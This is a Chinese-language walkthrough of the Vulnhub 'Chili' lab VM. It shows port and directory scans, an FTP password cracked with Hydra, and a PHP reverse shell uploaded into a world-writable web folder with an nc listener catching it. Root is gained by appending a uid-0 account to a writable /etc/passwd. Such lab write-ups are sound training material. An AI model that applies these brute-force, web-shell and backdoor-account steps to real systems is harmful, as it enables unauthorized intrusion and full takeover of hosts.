Vulnhub Chili靶机详细解题过程
Chili
识别目标主机IP地址
本靶机存在无法从Virtualbox自动获得IP地址的问题,根据本人另文来解决该问题。
──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:49:52:e5 1 60 PCS Systemtechnik GmbH
192.168.56.179 08:00:27:77:88:2e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.179
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.179 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 08:25 EST
Nmap scan report for bogon (192.168.56.179)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:77:88:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
Get Access
先看一下FTP服务,
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
目标不允许匿名服务,同时该版本的vsFTPd没有可利用的漏洞
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179
<html>
<body bgcolor="white">
<head>
<title>Chili</title>
<meta name="description" content="We Are Still Alive!">
<meta name="keywords" content="Chili">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
</head>
<link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
<style type="text/css">
@font-face {
font-family: 'Righteous', cursive;
font-family: 'Saira Stencil One', cursive;
}
</style>
<center><br><br>
<img src="Chile_WEB.jpg" width="400px" height="400px"><br>
</center></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ wget http://192.168.56.179/Chile_WEB.jpg
--2022-11-15 08:44:58-- http://192.168.56.179/Chile_WEB.jpg
Connecting to 192.168.56.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74290 (73K) [image/jpeg]
Saving to: ‘Chile_WEB.jpg’
Chile_WEB.jpg 100%[===============================================================================================================================>] 72.55K --.-KB/s in 0.001s
2022-11-15 08:44:58 (136 MB/s) - ‘Chile_WEB.jpg’ saved [74290/74290]
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ls
Chile_WEB.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ steghide extract -sf Chile_WEB.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ stegseek Chile_WEB.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.19% (132.4 MB)
[!] error: Could not find a valid passphrase.
图片也没有可利用的信息。
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.179 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.179
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/15 08:46:20 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 218740 / 220561 (99.17%)===============================================================
2022/11/15 08:46:42 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ nikto -h http://192.168.56.179
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.179
+ Target Hostname: 192.168.56.179
+ Target Port: 80
+ Start Time: 2022-11-15 08:46:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 291, size: 5aecf355f0724, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-15 08:47:40 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ dirb http://192.168.56.179
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 15 08:47:54 2022
URL_BASE: http://192.168.56.179/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.179/ ----
+ http://192.168.56.179/index.html (CODE:200|SIZE:657)
+ http://192.168.56.179/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Tue Nov 15 08:47:56 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.179
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/15 08:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 657]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101162 / 1102805 (99.85%)===============================================================
2022/11/15 08:50:56 Finished
===============================================================
目录扫描没有提取到任何有价值的信息,只能回过头来对准FTP服务了。
作者提示当觉得难以有进展的时候,想一想这个VM的名字,也就是chili
所以以chili作为用户名,Hydra破解一下ftp
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.179
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-15 08:54:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.179:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 296.00 tries/min, 888 tries in 00:03h, 14343511 to do in 807:38h, 16 active
[STATUS] 290.43 tries/min, 2033 tries in 00:07h, 14342366 to do in 823:04h, 16 active
[STATUS] 287.07 tries/min, 4306 tries in 00:15h, 14340093 to do in 832:34h, 16 active
[21][ftp] host: 192.168.56.179 login: chili password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-15 09:10:19
成功破解了FTP用户名和密码,现在登录一下ftp:
└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): chili
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32717|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58811|)
150 Here comes the directory listing.
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 220 Sep 07 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3526 Sep 07 2020 .bashrc
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .local
-rw-r--r-- 1 1000 1000 807 Sep 07 2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili
ftp> cd /var/www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18710|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Sep 08 2020 .
drwxr-xr-x 12 0 0 4096 Sep 08 2020 ..
drwxr-xr-x 4 0 0 4096 Sep 08 2020 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||37671|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 74290 Oct 22 2018 Chile_WEB.jpg
-rw-r--r-- 1 0 0 657 Sep 08 2020 index.html
226 Directory send OK.
ftp>
发现可以成功改变目标,可以进入到网站根目录,因此可以将php脚本上传到网站根目录
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
drwxrwxrwx 2 0 0 4096 Sep 08 2020 .nano
drwxr-xr-x 2 0 0 4096 Sep 08 2020 .vim
-rw-r--r-- 1 0 0 74290 Oct 22 2018 Chile_WEB.jpg
-rw-r--r-- 1 0 0 657 Sep 08 2020 index.html
226 Directory send OK.
ftp>
.nano目录任何用户可读可写,可以放到这个目录下
ftp> cd .nano
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||35742|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************| 5496 95.29 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (4.15 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||13137|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Nov 15 17:15 .
drwxr-xr-x 4 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 0 Sep 08 2020 index.html
-rw------- 1 1000 1000 5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> help
Commands may be abbreviated. Commands are:
! case dir fget idle mdelete modtime ntrans progress rcvbuf rmdir sndbuf type
$ cd disconnect form image mdir more open prompt recv rstatus status umask
account cdup edit ftp lcd mget mput page proxy reget runique struct unset
append chmod epsv gate less mkdir mreget passive put remopts send sunique usage
ascii close epsv4 get lpage mls msend pdir pwd rename sendport system user
bell cr epsv6 glob lpwd mlsd newer pls quit reset set tenex verbose
binary debug exit hash ls mlst nlist pmlsd quote restart site throttle xferbuf
bye delete features help macdef mode nmap preserve rate rhelp size trace ?
ftp> chmod 777 shell.php
200 SITE CHMOD command ok.
ftp> ls -alh
229 Entering Extended Passive Mode (|||30184|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Nov 15 17:15 .
drwxr-xr-x 4 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 0 Sep 08 2020 index.html
-rwxrwxrwx 1 1000 1000 5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/.nano/shell.php
在Kali Linux上成功拿到反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.179] 35822
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
17:17:26 up 54 min, 0 users, load average: 0.00, 0.02, 0.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@chili:/$
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/passwd
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html/.nano
/var/www/html/.nano/shell.php
Linpeas.sh脚本给出一个可疑文件,/etc/passwd可写
www-data@chili:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rw-r--rw- 1 root root 1.5K Sep 8 2020 /etc/passwd
利用Kali LInux openssl 工具生成密码:
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61
www-data@chili:/tmp$ echo 'jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
<j7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
www-data@chili:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
直接切换到Jason用户(拥有超级用户权限)
www-data@chili:/tmp$ su - jason
su - jason
Password: 123456
root@chili:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@chili:~# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Sep 8 2020 .
drwxr-xr-x 18 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 126 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 47 Sep 8 2020 proof.txt
-rw-r--r-- 1 root root 176 Sep 8 2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
root@chili:~#
成功提权!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
